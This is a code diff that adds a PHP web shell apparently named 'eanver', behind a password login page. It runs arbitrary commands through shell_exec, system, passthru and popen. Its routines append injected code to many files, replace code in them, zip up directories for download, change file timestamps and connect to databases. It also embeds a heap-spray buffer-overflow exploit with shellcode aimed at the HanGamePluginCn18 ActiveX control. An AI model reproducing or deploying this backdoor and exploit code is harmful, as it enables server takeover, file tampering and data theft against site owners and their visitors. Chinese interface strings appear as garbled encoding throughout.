+		case "shell_exec": $res = @shell_exec($cmd); break;
+		case "system": @ob_start();	@system($cmd); $res = @ob_get_contents();	@ob_end_clean();break;
+		case "passthru": @ob_start();	@passthru($cmd); $res = @ob_get_contents();	@ob_end_clean();break;
+		case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f))	$res .= @fread($f,1024);} @pclose($f);break;
+	}
+	return $res;
+}
+
+function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){
+	$show = do_show($dir);
+	foreach($show as $files){
+		if(is_dir($files) && $bool){
+			do_passreturn($files,$code,$type,$bool,$filetype,$shell);
+		}else{
+			if($files == $shell) continue;
+			switch($type){
+				case "guama":
+				if(debug($files,$filetype)){
+					do_write($files,"ab","\n".$code) ? html_n("�ɹ�--> $files<br>") : html_n("ʧ��--> $files<br>");
+				}
+				break;
+				case "qingma":
+				$filecode = @file_get_contents($files);
+				if(stristr($filecode,$code)){
+					$newcode = str_replace($code,'',$filecode);
+					do_write($files,"wb",$newcode) ? html_n("�ɹ�--> $files<br>") : html_n("ʧ��--> $files<br>");
+				}
+				break;
+				case "tihuan":
+				$filecode = @file_get_contents($files);
+				if(stristr($filecode,$code)){
+					$newcode = str_replace($code,$filetype,$filecode);
+					do_write($files,"wb",$newcode) ? html_n("�ɹ�--> $files<br>") : html_n("ʧ��--> $files<br>");
+				}
+				break;
+				case "scanfile":
+				$file = explode('/',$files);
+				if(stristr($file[count($file)-1],$code)){
+					html_a("?eanver=editr&p=$files",$files);
+					echo '<br>';
+				}
+				break;
+				case "scancode":
+				$filecode = @file_get_contents($files);
+				if(stristr($filecode,$code)){
+					html_a("?eanver=editr&p=$files",$files);
+					echo '<br>';
+				}
+				break;
+				case "scanphp":
+				$fileinfo = pathinfo($files);
+				if($fileinfo['extension'] == $code){
+					$filecode = @file_get_contents($files);
+					if(muma($filecode,$code)){
+						html_a("?eanver=editr&p=".urlencode($files),"�༭");
+						html_a("?eanver=del&p=".urlencode($files),"ɾ��");
+						echo $files.'<br>';
+					}
+				}
+				break;
+			}
+		}
+	}
+}
+
+
+class PHPzip{
+
+	var $file_count = 0 ;
+	var $datastr_len   = 0;
+	var $dirstr_len = 0;
+	var $filedata = '';
+	var $gzfilename;
+	var $fp;
+	var $dirstr='';
+
+    function unix2DosTime($unixtime = 0) {
+        $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
+
+        if ($timearray['year'] < 1980) {
+        	$timearray['year']    = 1980;
+        	$timearray['mon']     = 1;
+        	$timearray['mday']    = 1;
+        	$timearray['hours']   = 0;
+        	$timearray['minutes'] = 0;
+        	$timearray['seconds'] = 0;
+        }
+
+        return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
+               ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
+    }
+
+	function startfile($path = 'QQqun555227.zip'){
+		$this->gzfilename=$path;
+		$mypathdir=array();
+		do{
+			$mypathdir[] = $path = dirname($path);
+		}while($path != '.');
+		@end($mypathdir);
+		do{
+			$path = @current($mypathdir);
+			@mkdir($path);
+		}while(@prev($mypathdir));
+
+		if($this->fp=@fopen($this->gzfilename,"w")){
+			return true;
+		}
+		return false;
+	}
+
+    function addfile($data, $name){
+        $name     = str_replace('\\', '/', $name);
+		
+		if(strrchr($name,'/')=='/') return $this->adddir($name);
+		
+        $dtime    = dechex($this->unix2DosTime());
+        $hexdtime = '\x' . $dtime[6] . $dtime[7]
+                  . '\x' . $dtime[4] . $dtime[5]
+                  . '\x' . $dtime[2] . $dtime[3]
+                  . '\x' . $dtime[0] . $dtime[1];
+        eval('$hexdtime = "' . $hexdtime . '";');
+
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $c_len   = strlen($zdata);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+		
+        $datastr  = "\x50\x4b\x03\x04";
+        $datastr .= "\x14\x00"; 
+        $datastr .= "\x00\x00";
+        $datastr .= "\x08\x00"; 
+        $datastr .= $hexdtime; 
+        $datastr .= pack('V', $crc);
+        $datastr .= pack('V', $c_len);
+        $datastr .= pack('V', $unc_len);
+        $datastr .= pack('v', strlen($name));
+        $datastr .= pack('v', 0); 
+        $datastr .= $name;
+        $datastr .= $zdata;
+        $datastr .= pack('V', $crc); 
+        $datastr .= pack('V', $c_len);
+        $datastr .= pack('V', $unc_len);
+
+
+		fwrite($this->fp,$datastr);
+		$my_datastr_len = strlen($datastr);
+		unset($datastr);
+		
+        $dirstr  = "\x50\x4b\x01\x02";
+        $dirstr .= "\x00\x00"; 
+        $dirstr .= "\x14\x00";
+        $dirstr .= "\x00\x00";
+        $dirstr .= "\x08\x00";
+        $dirstr .= $hexdtime;
+        $dirstr .= pack('V', $crc); 
+        $dirstr .= pack('V', $c_len); 
+        $dirstr .= pack('V', $unc_len);       	// uncompressed filesize
+        $dirstr .= pack('v', strlen($name) ); 	// length of filename
+        $dirstr .= pack('v', 0 );             	// extra field length
+        $dirstr .= pack('v', 0 );             	// file comment length
+        $dirstr .= pack('v', 0 );             	// disk number start
+        $dirstr .= pack('v', 0 );             	// internal file attributes
+        $dirstr .= pack('V', 32 );            	// external file attributes - 'archive' bit set
+        $dirstr .= pack('V',$this->datastr_len ); // relative offset of local header
+        $dirstr .= $name;
+		
+		$this->dirstr .= $dirstr;	//Ŀ¼��Ϣ
+		
+		$this -> file_count ++;
+		$this -> dirstr_len += strlen($dirstr);
+		$this -> datastr_len += $my_datastr_len;	
+    }
+
+	function adddir($name){ 
+		$name = str_replace("\\", "/", $name); 
+		$datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
+		
+		$datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
+		$datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); 
+
+		fwrite($this->fp,$datastr);	//д���µ��ļ�����
+		$my_datastr_len = strlen($datastr);
+		unset($datastr);
+		
+		$dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
+		$dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
+		$dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); 
+		$dirstr .= pack("V", 16 ).pack("V",$this->datastr_len).$name; 
+		
+		$this->dirstr .= $dirstr;	//Ŀ¼��Ϣ
+
+		$this -> file_count ++;
+		$this -> dirstr_len += strlen($dirstr);
+		$this -> datastr_len += $my_datastr_len;	
+	}
+
+
+	function createfile(){
+		//ѹ����������Ϣ,�����ļ�����,Ŀ¼��Ϣ��ȡָ��λ�õ���Ϣ
+		$endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00" .
+					pack('v', $this -> file_count) .
+					pack('v', $this -> file_count) .
+					pack('V', $this -> dirstr_len) .
+					pack('V', $this -> datastr_len) .
+					"\x00\x00";
+
+		fwrite($this->fp,$this->dirstr.$endstr);
+		fclose($this->fp);
+	}
+ }
+
+function File_Act($array,$actall,$inver,$REAL_DIR)
+{
+	if(($count = count($array)) == 0) return '��ѡ���ļ�';
+	if($actall == 'e')
+	{
+     function listfiles($dir=".",$faisunZIP,$mydir){
+		$sub_file_num = 0;
+		if(is_file($mydir."$dir")){
+		  if(realpath($faisunZIP ->gzfilename)!=realpath($mydir."$dir")){
+			$faisunZIP -> addfile(file_get_contents($mydir.$dir),"$dir");
+			return 1;
+		  }
+			return 0;
+		}
+		
+		$handle=opendir($mydir."$dir");
+		while ($file = readdir($handle)) {
+		   if($file=="."||$file=="..")continue;
+		   if(is_dir($mydir."$dir/$file")){
+			 $sub_file_num += listfiles("$dir/$file",$faisunZIP,$mydir);
+		   }
+		   else {
+		   	   if(realpath($faisunZIP ->gzfilename)!=realpath($mydir."$dir/$file")){
+			     $faisunZIP -> addfile(file_get_contents($mydir.$dir."/".$file),"$dir/$file");
+				 $sub_file_num ++;
+				}
+		   }
+		}
+		closedir($handle);
+		if(!$sub_file_num) $faisunZIP -> addfile("","$dir/");
+		return $sub_file_num;
+	}
+
+   function num_bitunit($num){
+	  $bitunit=array(' B',' KB',' MB',' GB');
+	  for($key=0;$key<count($bitunit);$key++){
+		if($num>=pow(2,10*$key)-1){ //1023B ����ʾΪ 1KB
+		  $num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]";
+		}
+	  }
+	  return $num_bitunit_str;
+   }
+
+	$mydir=$REAL_DIR.'/';
+	if(is_array($array)){
+		$faisunZIP = new PHPzip;
+		if($faisunZIP -> startfile("$inver")){
+			$filenum = 0;
+			foreach($array as $file){
+				$filenum += listfiles($file,$faisunZIP,$mydir);
+			}
+			$faisunZIP -> createfile();
+			return "ѹ�����,������ $filenum ���ļ�.<br><a href='$inver'>������� $inver (".num_bitunit(filesize("$inver")).")</a>";
+		}else{
+			return "$inver ����д��,����·����Ȩ���Ƿ���ȷ.<br>";
+		}
+	}else{
+		return "û��ѡ����ļ���Ŀ¼.<br>";
+	}
+
+
+	}
+	$i = 0;
+	while($i < $count)
+	{
+		$array[$i] = urldecode($array[$i]);
+		switch($actall)
+		{
+			case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '·������'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '���Ƶ�'.$inver.'Ŀ¼'; break;
+			case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = 'ɾ��'; break;
+			case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '����ֵ����'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '�����޸�Ϊ'.$inver; break;
+			case "d" : @touch($array[$i],strtotime($inver)); $msg = '�޸�ʱ��Ϊ'.$inver; break;
+		}
+		$i++;
+	}
+	return '��ѡ�ļ�'.$msg.'���';
+}
+
+	function start_unzip($tmp_name,$new_name,$todir='zipfile'){
+		$z = new Zip;
+		$have_zip_file=0;
+		$upfile = array("tmp_name"=>$tmp_name,"name"=>$new_name);
+		if(is_file($upfile[tmp_name])){
+			$have_zip_file = 1;
+			echo "<br>���ڽ�ѹ: $upfile[name]<br><br>";
+			if(preg_match('/\.zip$/mis',$upfile[name])){
+				$result=$z->Extract($upfile[tmp_name],$todir);
+				if($result==-1){
+					echo "<br>�ļ� $upfile[name] ����.<br>";
+				}
+				echo "<br>���,������ $z->total_folders ��Ŀ¼,$z->total_files ���ļ�.<br><br><br>";
+			}else{
+				echo "<br>$upfile[name] ���� zip �ļ�.<br><br>";			
+			}
+			if(realpath($upfile[name])!=realpath($upfile[tmp_name])){
+				@unlink($upfile[name]);
+				rename($upfile[tmp_name],$upfile[name]);
+			}
+		}
+	}
+
+function muma($filecode,$filetype){
+	$dim = array(
+	"php" => array("eval(","exec("),
+	"asp" => array("WScript.Shell","execute(","createtextfile("),
+	"aspx" => array("Response.Write(eval(","RunCMD(","CreateText()"),
+	"jsp" => array("runtime.exec(")
+	);
+	foreach($dim[$filetype] as $code){
+		if(stristr($filecode,$code)) return true;
+	}
+}
+
+function debug($file,$ftype){
+	$type=explode('|',$ftype);
+	foreach($type as $i){
+		if(stristr($file,$i))	return true;
+	}
+}
+
+/*---string---*/
+
+function str_path($path){
+	return str_replace('//','/',$path);
+}
+
+function msg($msg){
+	die("<script>window.alert('".$msg."');history.go(-1);</script>");
+}
+
+function uppath($nowpath){
+	$nowpath = str_replace('\\','/',dirname($nowpath));
+	return urlencode($nowpath);
+}
+
+function xxstr($key){
+	$temp = str_replace("\\\\","\\",$key);
+	$temp = str_replace("\\","\\\\",$temp);
+	return $temp;
+}
+
+/*---html---*/
+
+function html_ta($url,$name){
+	html_n("<a href=\"$url\" target=\"_blank\">$name</a>");
+}
+
+function html_a($url,$name,$where=''){
+	html_n("<a href=\"$url\" $where>$name</a> ");
+}
+
+function html_img($url){
+	html_n("<img src=\"?img=$url\" border=0>");
+}
+
+function back(){
+	html_n("<input type='button' value='����' onclick='history.back();'>");
+}
+
+function html_radio($namei,$namet,$v1,$v2){
+	html_n('<input type="radio" name="return" value="'.$v1.'" checked>'.$namei);
+	html_n('<input type="radio" name="return" value="'.$v2.'">'.$namet.'<br><br>');
+}
+
+function html_input($type,$name,$value = '',$text = '',$size = '',$mode = false){
+	if($mode){
+		html_n("<input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\" checked>$text");
+	}else{
+		html_n("$text <input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\">");
+	}
+}
+
+function html_text($name,$cols,$rows,$value = ''){
+	html_n("<br><br><textarea name=\"$name\" COLS=\"$cols\" ROWS=\"$rows\" >$value</textarea>");
+}
+
+function html_select($array,$mode = '',$change = '',$name = 'class'){
+	html_n("<select name=$name $change>");
+	foreach($array as $name => $value){
+		if($name == $mode){
+			html_n("<option value=\"$name\" selected>$value</option>");
+		}else{
+			html_n("<option value=\"$name\">$value</option>");
+		}
+	}
+	html_n("</select>");
+}
+
+function html_font($color,$size,$name){
+	html_n("<font color=\"$color\" size=\"$size\">$name</font>");
+}
+
+function GetHtml($url)
+{
+      $c = '';
+      $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
+      if(function_exists('fsockopen')){
+    	$link = parse_url($url);
+	    $query=$link['path'].'?'.$link['query'];
+	    $host=strtolower($link['host']);
+	    $port=$link['port'];
+	    if($port==""){$port=80;}
+	    $fp = fsockopen ($host,$port, $errno, $errstr, 10);
+	    if ($fp)
+	      {
+		    $out = "GET /{$query} HTTP/1.0\r\n"; 
+		    $out .= "Host: {$host}\r\n"; 
+		    $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n"; 
+		    $out .= "Connection: Close\r\n\r\n"; 
+		    fwrite($fp, $out);
+		    $inheader=1;
+		    while(!feof($fp)) 
+		         {$line=fgets($fp,4096);	
+			      if($inheader==0){$contents.=$line;}
+			      if ($inheader &&($line=="\n"||$line=="\r\n")){$inheader = 0;}
+		    } 
+		    fclose ($fp); 
+		    $c= $contents;
+	      }
+        }
+		if(empty($c) && function_exists('curl_init') && function_exists('curl_exec')){
+            $ch = curl_init();
+            curl_setopt($ch, CURLOPT_URL, $url);
+            curl_setopt($ch, CURLOPT_TIMEOUT, 15);
+            curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
+            curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
+            $c = curl_exec($ch);
+            curl_close($ch);
+        }
+        if(empty($c) && ini_get('allow_url_fopen')){
+            $c = file_get_contents($url);
+        }
+		if(empty($c)){
+            echo "document.write('<DIV style=\'CURSOR:url(\"$url\")\'>');";
+        }
+		if(!empty($c))
+		{
+        return $c;
+		}
+ }
+
+function html_main($path,$shellname){
+$serverip=gethostbyname($_SERVER['SERVER_NAME']);
+print<<<END
+<html><title>{$shellname}</title>
+<table width='100%'><tr><td width='150' align='center'>{$serverip}</td><td><form method='GET' target='main'><input type='hidden' name='eanver' value='main'><input name='path' style='width:100%' value='{$path}'></td><td width='140' align='center'><input name='Submit' type='submit' value='����'> <input type='submit' value='ˢ��' onclick='main.location.reload()'></td></tr></form></table>
+END;
+	html_n("<table width='100%' height='95.7%' border=0 cellpadding='0' cellspacing='0'><tr><td width='170'><iframe name='left' src='?eanver=left' width='100%' height='100%' frameborder='0'>");
+	html_n("</iframe></td><td><iframe name='main' src='?eanver=main' width='100%' height='100%' frameborder='1'>");
+	html_n("</iframe></td></tr></table></html>");
+}
+
+function islogin($shellname,$myurl){
+print<<<END
+<style type="text/css">body,td{font-size: 12px;color:#00ff00;background-color:#000000;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}.C{background-color:#000000;border:0px}.cmd{background-color:#000;color:#FFF}body{margin: 0px;margin-left:4px;}BODY {SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}.am{color:#888;font-size:11px;}</style>
+<body style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" scroll=no><center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><a href='{$myurl}' target='_blank'>{$shellname}</a><br><br><form method='post'>�������룺<input name='envlpass' type='password' size='22'> <input type='submit' value='��½'><br><br><br><font color=#3399FF>�������ڷǷ���;��������߸Ų�����</font><br></div></center>
+END;
+}
+
+function html_sql(){
+	html_input("text","sqlhost","localhost","<br>MYSQL��ַ","30");
+	html_input("text","sqlport","3306","<br>MYSQL�˿�","30");
+	html_input("text","sqluser","root","<br>MYSQL�û�","30");
+	html_input("password","sqlpass","","<br>MYSQL����","30");
+	html_input("text","sqldb","dbname","<br>MYSQL����","30");
+	html_input("submit","sqllogin","��½","<br>");
+	html_n('</form>');
+}
+
+function Mysql_Len($data,$len)
+{
+	if(strlen($data) < $len) return $data;
+	return substr_replace($data,'...',$len);
+}
+
+function html_n($data){
+	echo "$data\n";
+}
+
+/*---css---*/
+
+function css_img($img){
+	$images = array(
+	"exe"=>
+	"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".
+	"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".
+	"xhIAOw==",
+	"dir"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA".
+	"AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE".
+	"oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+	"txt"=>
+	"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".
+	"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".
+	"UpPWG3Ig6Hq/XmRjuZwkAAA7",
+	"html"=>
+	"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".
+	"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".
+	"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".
+	"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".
+	"ADs=",
+	"js"=>
+	"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".
+	"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".
+	"a00AjYYBbc/o9HjNniUAADs=",
+	"xml"=>
+	"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".
+	"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+	"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".
+	"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".
+	"IQA7",
+	"mp3"=>
+	"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
+	"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
+	"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
+	"img"=>
+	"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".
+	"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".
+	"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".
+	"FxEAOw==",
+	"title"=>"R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+".
+	"mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+	"ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL".
+	"I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",
+	"rar"=>"R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
+    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/".
+    "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b".
+    "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC".
+    "aNOmRcjVj02tPxPCzfkvIAA7"
+	);
+  header('Content-type: image/gif');
+  echo base64_decode($images[$img]);
+  die();
+}
+
+function css_showimg($file){
+	$it=substr($file,-3);
+	switch($it){
+		case "jpg": case "gif": case "bmp": case "png": case "ico": return 'img';break;
+		case "htm": case "tml": return 'html';break;
+		case "exe": case "com": return 'exe';break;
+		case "xml": case "doc": return 'xml';break;
+		case ".js": case "vbs": return 'js';break;
+		case "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi":case "mp4":case "mvb": return 'mp3';break;
+		case "rar": case "tar": case ".gz": case "zip":case "iso": return 'rar';break;
+  	default: return 'txt';break;
+	}
+}
+
+function css_js($num,$code = ''){
+	if($num == "shellcode"){
+		return '<%@ LANGUAGE="JavaScript" %>
+		<%
+		var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");
+		var shellcode = unescape("'.$code.'");
+		var bigblock = unescape("%u9090%u9090");
+		var headersize = 20;
+		var slackspace = headersize+shellcode.length;
+		while (bigblock.length<slackspace) bigblock+=bigblock;
+		fillblock = bigblock.substring(0, slackspace);
+		block = bigblock.substring(0, bigblock.length-slackspace);
+		while(block.length+slackspace<0x40000) block = block+block+fillblock;
+		memory = new Array();
+		for (x=0; x<300; x++) memory[x] = block + shellcode;
+		var buffer = "";
+		while (buffer.length < 1319) buffer+="A";
+		buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer;
+		act.hgs_startNotify(buffer);
+		%>';
+	}
+	html_n('<script language="javascript">');
+	if($num == "1"){
+	html_n('	function rusurechk(msg,url){
+		smsg = "FileName:[" + msg + "]\nPlease Input New File:";
+		re = prompt(smsg,msg);
+		if (re){
+			url = url + re;
+			window.location = url;
+		}
+	}
+	function rusuredel(msg,url){
+		smsg = "Do You Suer Delete [" + msg + "] ?";
+		if(confirm(smsg)){
+			URL = url + msg;
+			window.location = url;
+		} 
+	}
+	function Delok(msg,gourl)
+	{
+		smsg = "ȷ��Ҫɾ��[" + unescape(msg) + "]��?";
+		if(confirm(smsg))
+		{
+			if(gourl == \'b\')
+			{
+				document.getElementById(\'actall\').value = escape(gourl);
+				document.getElementById(\'fileall\').submit();
+			}
+			else window.location = gourl;
+		}
+	}
+	function CheckAll(form)
+	{
+		for(var i=0;i<form.elements.length;i++)
+		{
+			var e = form.elements[i];
+			if (e.name != \'chkall\')
+			e.checked = form.chkall.checked;
+		}
+	}
+	function CheckDate(msg,gourl)
+	{
+		smsg = "��ǰ�ļ�ʱ��:[" + msg + "]";
+		re = prompt(smsg,msg);
+		if(re)
+		{
+			var url = gourl + re;
+			var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
+			var r = re.match(reg);
+			if(r==null){alert(\'���ڸ�ʽ����ȷ!��ʽ:yyyy-mm-dd hh:mm:ss\');return false;}
+			else{document.getElementById(\'actall\').value = gourl; document.getElementById(\'inver\').value = re; document.getElementById(\'fileall\').submit();}
+		}
+	}
+	function SubmitUrl(msg,txt,actid)
+	{
+		re = prompt(msg,unescape(txt));
+		if(re)
+		{
+			document.getElementById(\'actall\').value = actid;
+			document.getElementById(\'inver\').value = escape(re);
+			document.getElementById(\'fileall\').submit();
+		}
+	}');
+	}elseif($num == "2"){
+	html_n('var NS4 = (document.layers);
+var IE4 = (document.all);
+var win = this;
+var n = 0;
+function search(str){
+	var txt, i, found;
+	if(str == "")return false;
+	if(NS4){
+		if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
+		if(n == 0) alert(str + " ... Not-Find")
+	}
+	if(IE4){
+		txt = win.document.body.createTextRange();
+		for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
+			txt.moveStart("character", 1);
+			txt.moveEnd("textedit")
+		}
+		if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
+		else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
+	}
+	return false
+}
+function CheckDate(){
+	var re = document.getElementById(\'mtime\').value;
+	var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/; 
+	var r = re.match(reg);
+	if(r==null){alert(\'���ڸ�ʽ����ȷ!��ʽ:yyyy-mm-dd hh:mm:ss\');return false;}
+	else{document.getElementById(\'editor\').submit();}
+}');
+}elseif($num == "3"){
+	html_n('function Full(i){
+   if(i==0 || i==5){
+     return false;
+   }
+  Str = new Array(12);  
+	Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb";
+	Str[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****";
+	Str[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****";
+	Str[4] = "Provider=MSDAORA.1;Password=����;User ID=�ʺ�;Data Source=������;Persist Security Info=True;";
+	Str[6] = "SELECT * FROM [TableName] WHERE ID<100";
+	Str[7] = "INSERT INTO [TableName](USER,PASS) VALUES(\'eanver\',\'mypass\')";
+	Str[8] = "DELETE FROM [TableName] WHERE ID=100";
+	Str[9] = "UPDATE [TableName] SET USER=\'eanver\' WHERE ID=100";
+	Str[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
+	Str[11] = "DROP TABLE [TableName]";
